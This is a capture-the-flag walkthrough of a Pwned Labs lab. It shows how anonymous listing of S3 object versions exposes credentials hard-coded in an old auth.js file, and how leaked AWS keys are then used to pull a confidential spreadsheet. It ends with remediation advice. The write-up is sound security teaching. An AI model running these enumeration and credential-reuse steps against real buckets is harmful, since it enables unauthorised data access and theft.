Leveraging S3 Bucket Versioning

A walkthrough demonstrating how S3 Bucket Versioning can lead to data exposure and exfiltration.

CTF Source: Pwned Labs

YouTube Walkthrough

Overview

In this walkthrough, we'll discover how improper permissions to S3 Bucket Versioning can lead to unintentional data exposure and exfiltration.

Pre-Requisites

  • Install awscli: brew install awscli (macOS) or apt install awscli (Linux)

Walkthrough

Website Enumeration

We’re given the IP 16.171.123.169, and after finding port 443 open, we discover a login page in the browser.

Viewing the web page source code, we find an S3 bucket.

Navigating to the root of the S3 bucket, we can see two prefixes: private and static.

S3 Bucket Enumeration

Let’s try enumerating the bucket with the aws cli.

aws --no-sign-request s3 ls s3://huge-logistics-dashboard --recursive

2023-08-16 12:25:59          0 private/
2023-08-12 13:09:01     833071 static/css/dashboard-free.css.map
2023-08-12 13:09:14     402732 static/css/dashboard.css
2023-08-12 13:09:17        904 static/css/demo.css
2023-08-12 13:09:19       7743 static/css/icons.css
2023-08-12 13:09:19        495 static/css/main.css
2023-08-12 13:08:05      15996 static/images/favicon.ico
[snip]

Let’s see if S3 bucket versioning has been set up.

aws --no-sign-request s3api list-object-versions --bucket huge-logistics-dashboard > bucket_versions.json
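The JSON output can get long, so a quick script helps surface the interesting entries: keys with multiple versions and keys hidden behind delete markers. A minimal sketch (the sample data below is illustrative but mirrors the shape of the real list-object-versions output; in practice you would json.load the saved bucket_versions.json):

```python
import json
from collections import Counter

# Illustrative sample shaped like `aws s3api list-object-versions` output.
# Against the real bucket, load the saved file instead:
#   listing = json.load(open("bucket_versions.json"))
listing = {
    "Versions": [
        {"Key": "static/js/auth.js", "VersionId": "qgWpDiIwY05TGdUvTnGJSH49frH_7.yh", "IsLatest": False},
        {"Key": "static/js/auth.js", "VersionId": "example-latest-id", "IsLatest": True},
    ],
    "DeleteMarkers": [
        {"Key": "private/Business Health - Board Meeting (Confidential).xlsx",
         "VersionId": "whIGcxw1PmPE1Ch2uUwSWo3D5WbNrPIR", "IsLatest": True},
    ],
}

# Keys with more than one version are worth a closer look: an older
# version may still hold secrets that were "removed" in a later upload.
counts = Counter(v["Key"] for v in listing.get("Versions", []))
multi_version_keys = sorted(k for k, n in counts.items() if n > 1)

# A delete marker only hides the object; the underlying versions remain retrievable.
deleted_keys = sorted(m["Key"] for m in listing.get("DeleteMarkers", []))

print("Multiple versions:", multi_version_keys)
print("Delete markers:   ", deleted_keys)
```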

Side Quest

We can also use curl on a bucket object to view information about versioning and delete markers.

Amazon provides documentation on these response headers if you want to learn more.

In this example, I needed to URL-encode the xlsx file name, replacing each space with %20.

curl -I https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/private/Business%20Health%20-%20Board%20Meeting%20(Confidential).xlsx

HTTP/1.1 404 Not Found
x-amz-request-id: BA2PQ7K6RPRYS0TQ
x-amz-id-2: leBOpuK9ZZTPrMBqiuiInV9gKvZJ2hw2c4sBeq4+fP8E1WrCmcEGaV3GadMFWWcjun1XYXjzk38=
x-amz-delete-marker: true
x-amz-version-id: whIGcxw1PmPE1Ch2uUwSWo3D5WbNrPIR
Content-Type: application/xml
Date: Sun, 21 Jan 2024 19:24:59 GMT
Server: AmazonS3
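Rather than encoding by hand, Python's standard library can do it. A small sketch (the key and bucket URL are the ones from this lab; note that quote() also encodes the parentheses, which S3 accepts just as well as leaving them literal):

```python
from urllib.parse import quote

# Percent-encode an S3 key for use in a raw HTTPS URL.
# quote() leaves "/" unescaped by default, so the prefix stays intact.
key = "private/Business Health - Board Meeting (Confidential).xlsx"
encoded = quote(key)
url = f"https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/{encoded}"
print(url)
```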

Finding Credentials (login page)

Let’s try downloading the latest file version (the one without the delete marker) of Business Health - Board Meeting (Confidential).xlsx.

aws --no-sign-request s3api get-object --bucket huge-logistics-dashboard --key "private/Business Health - Board Meeting (Confidential).xlsx" --version-id HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8 board_meeting_latest.xlsx

An error occurred (AccessDenied) when calling the GetObject operation: Access Denied

No dice.

However, the version listing shows that the file auth.js has an older version.

If we try downloading that previous version, we’ll find we’re successful, and we’ll also find credentials!

aws --no-sign-request s3api get-object --bucket huge-logistics-dashboard --key "static/js/auth.js" --version-id qgWpDiIwY05TGdUvTnGJSH49frH_7.yh auth.js      
   
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-08-12T19:13:25+00:00",
    "ContentLength": 463,
    "ETag": "\"7b63218cfe1da7f845bfc7ba96c2169f\"",
    "VersionId": "qgWpDiIwY05TGdUvTnGJSH49frH_7.yh",
    "ContentType": "application/javascript",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}

Let's read the file contents.

cat auth.js          

$(document).ready(function(){
    $(".btn-login").on("click", login);
});

function login(){
    email = $('#emailForm')[0].value;
    password = $('#passwordForm')[0].value;
    data = {'email':email, 'password':password};
    doLogin(data);
}
//Please remove this after testing. Password change is not necessary to implement so keep this secure!
function test_login(){
        data = {'email':'[snip]', 'password':'[snip]'}
        doLogin(data);
}  

Gaining Access to Webpage & Finding AWS Access Keys

With these credentials, we can log in to the original login page of the website. It appears to be a dashboarding app.

Poking around, we can find plaintext AWS Access Keys!

Finding the Flag!

Before configuring these AWS credentials, we’ll need to know what region we’re working in. Let’s check which region the S3 bucket is in using curl.

curl -I http://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com -s | grep -i 'x-amz-bucket-region'

x-amz-bucket-region: eu-north-1

Great! We’re working in the eu-north-1 region. Let’s set up our new AWS credentials.

aws configure --profile admin
aws --profile admin sts get-caller-identity
{
    "UserId": "AIDATWVWNKAVEJCVKW2CS",
    "Account": "254859366442",
    "Arn": "arn:aws:iam::254859366442:user/data-user"
}

Sweet! Looks like we’re the data-user. Alright, with our new profile, let’s attempt to download that xlsx file again.

aws --profile admin s3api get-object --bucket huge-logistics-dashboard --key "private/Business Health - Board Meeting (Confidential).xlsx" --version-id HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8 board_meeting_latest.xlsx
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-08-16T19:11:03+00:00",
    "ContentLength": 24119,
    "ETag": "\"24f3e7a035c28ef1f75d63a93b980770\"",
    "VersionId": "HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8",
    "ContentType": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}

Since I don’t have a program to open xlsx files on my Kali Linux box, I’ll transfer the file over to my Mac.

And here’s the flag!

Wrap Up

So, in this CTF, we discovered an S3-hosted website. Upon enumerating the bucket, we found credentials in an old file version, used those to access a company dashboard tool, and discovered plaintext AWS Access Keys leading to the exfiltration of sensitive company data. Here are some recommended actions administrators can take to prevent this from happening.

  1. Tighten the S3 Bucket Policy

  • The bucket policy allowed “Everyone” to perform s3:ListBucketVersions and s3:GetObjectVersion, leading to the discovery of hard-coded credentials in an old version of the file auth.js.

  • See below for a potential policy that can be used; note that it still allows public read access to all bucket contents (see point 2).

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadGetObject",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:GetObject"
            ],
            "Resource": [
                "arn:aws:s3:::Bucket-Name/*"
            ]
        }
    ]
}
  2. Eliminate S3 bucket multi-use

  • Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.

  • Since this bucket is hosting a publicly accessible website, only store files relevant to the website.

  • If moving data to a new location, ensure any remnants get deleted. The command below can perform this action.

aws s3api delete-object --bucket huge-logistics-dashboard --key "private/Business Health - Board Meeting (Confidential).xlsx" --version-id "HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8"
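Deleting remnants one version at a time gets tedious, and every version and delete marker must go. As a sketch (the keys and version IDs below are made up), we can build a payload for s3api delete-objects, which removes up to 1,000 versions per request:

```python
import json

# Hypothetical leftover listing, shaped like `list-object-versions` output,
# filtered to the prefix being cleaned up. Keys and version IDs are made up.
leftovers = {
    "Versions": [
        {"Key": "private/old-report.xlsx", "VersionId": "example-v1"},
        {"Key": "private/old-report.xlsx", "VersionId": "example-v2"},
    ],
    "DeleteMarkers": [
        {"Key": "private/old-report.xlsx", "VersionId": "example-marker"},
    ],
}

# Supplying VersionId removes the version itself rather than adding
# another delete marker on top.
objects = [
    {"Key": o["Key"], "VersionId": o["VersionId"]}
    for section in ("Versions", "DeleteMarkers")
    for o in leftovers.get(section, [])
]
payload = {"Objects": objects, "Quiet": True}

with open("delete.json", "w") as f:
    json.dump(payload, f, indent=2)
# Then: aws s3api delete-objects --bucket huge-logistics-dashboard --delete file://delete.json
```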
  3. Ensure employees are trained and have access to a credential manager.

  • In this case, an employee’s AWS Access Keys were found improperly stored in their Dashboard profile

  • Securely store credentials in solutions such as AWS Secrets Manager, HashiCorp Vault, or similar.
